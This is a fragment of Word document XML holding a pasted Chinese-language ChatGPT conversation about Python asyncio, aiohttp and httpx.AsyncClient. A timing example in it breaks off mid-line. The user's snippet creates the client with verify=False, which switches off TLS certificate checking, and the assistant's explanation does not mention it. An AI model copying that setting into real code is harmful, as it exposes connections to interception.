    <w:p w14:paraId="67778A18" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>async def fetch(session, url):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9B84C" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with session.get(url) as response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2025EE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        return await response.text()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C1213" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D2E2AFC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F33D558" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with aiohttp.ClientSession() as session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028C7BF8" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        html = await fetch(session, 'http://python.org')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627C9B41" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(html)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615CF55D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463DDF14" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA3EA7E" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0167B0A7" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    asyncio</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和多线程的性能比较：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B7016" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4477E131" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4606F66F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1428CDCE" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6C0444" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56EC99E4" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD89CF7" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>async def job():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A0A811B" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print('Start job')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5007A653" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    await asyncio.sleep(2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50849CDC" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">    print('Job finished')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A82948B" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E894C32" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>start = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043D00BF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(job())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3352460D" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>print('Asyncio time:', time.time() - start)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76563012" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="637F0A17" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t># threading</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB2EF65" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>def job():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A96C3C4" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print('Start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09134A06" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>我不懂</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>async def make_request(url_str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="440B86BF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7BED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>async with</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7BED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>client</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="093D1A91" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRPr="00256F53" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        response = </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7BED">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>await client.</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>post(url=url_str, json=data, headers=headers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0830E39A" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">        print(response.text)</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>的写法，告诉我你对他详细的解读。我不太懂</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve"> async</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>await</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A715D78" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A1B7DB0" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这段代码是使用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> async/await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> httpx </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库（一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端库）来创建一个异步的网络请求。这是一种非阻塞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作，这意味着你的程序不会在等待网络请求的响应时停止执行其他代码。让我们逐行解析：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB1B282" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B1A22CF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    async def make_request(url_str): - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这是定义一个异步函数的语法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>async</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>关键字表示这个函数是一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>协程</w:t>
      </w:r>
      <w:r w:rsidRPr="00256F53">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的一种特殊类型的函数，它可以在执行过程中被挂起，执行其他任务，然后在适当的时候恢复执行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B62329" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A6FAC11" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    async with httpx.AsyncClient(proxies=proxies, http2=True, verify=False) as client: - async with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是异步上下文管理器，它的作用类似于常规的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语句，但它是用于异步操作的。这里，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpx.AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>创建了一个异步的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>客户端。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5928EFA7" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="127EAD97" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    response = await client.post(url=url_str, json=data, headers=headers) - await</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>关键字是用于在协程中挂起函数的执行，直到等待的操作完成。在这里，它挂起了函数的执行，直到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请求完成并返回响应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D63E1E" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5619CA95" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(response.text) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这行代码打印了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>响应的文本部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367D8D1F" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="099BB3AF" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总的来说，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">async/await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语法提供了一种在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中进行异步编程的方式，它允许你编写出非阻塞的代码，这对于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>密集型操作（如网络请求）非常有用，因为在等待响应时，你的程序可以继续执行其他任务。这样就提高了程序的并发性能，尤其是在处理大量网络请求或其他</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作的时候。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3548F6C0" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B2EE3BD" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB7BED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>这里的</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7BED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>httpx.AsyncClient</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB7BED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>能不能被重复使用，我给他提供不同的请求参数，他给我返回</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E3A825" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>ChatGPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B66F28" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29D31199" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是的，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>httpx.AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例可以被重复使用。你可以使用同一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例发送多个请求。每次请求时，你都可以提供不同的请求参数（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>、数据、头部信息等）。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会根据提供的参数执行请求，并返回相应的响应。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2156D9AD" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE97314" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以下是一个例子，展示如何使用同一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AsyncClient</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实例发送多个请求：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F086B4" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="576C8952" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>python</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DCF823" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D283F64" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import httpx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C14AFB9" w14:textId="77777777" w:rsidR="00A67E21" w:rsidRDefault="00A67E21" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
